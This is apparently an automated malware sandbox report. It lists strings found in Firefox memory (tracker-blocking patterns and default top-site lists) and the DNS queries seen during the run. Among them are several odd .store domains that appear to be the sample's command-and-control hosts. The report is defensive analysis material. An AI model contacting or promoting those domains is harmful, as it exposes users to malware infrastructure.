Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/data/ua_overrides.jsBoolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/data/ua_overrides.jsBoolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/data/ua_overrides.jsBoolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://646a4d4e-1c34-4cd3-8ff4-db6708ff39aa/selector/callBackground.js equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://646a4d4e-1c34-4cd3-8ff4-db6708ff39aa/selector/callBackground.js equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://646a4d4e-1c34-4cd3-8ff4-db6708ff39aa/selector/callBackground.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3028948986.0000025E7E9DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3028948986.0000025E7E9DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3028948986.0000025E7E9DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: main/url-classifier-skip-urlsdiscoverystream.spoc.impressionsget isRunningOnCompositorhttps://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3062161151.0000025E81CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3053736608.0000025E818A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3068152789.0000025E82450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3053736608.0000025E818A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3062161151.0000025E81CA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81CE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3068152789.0000025E82433000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
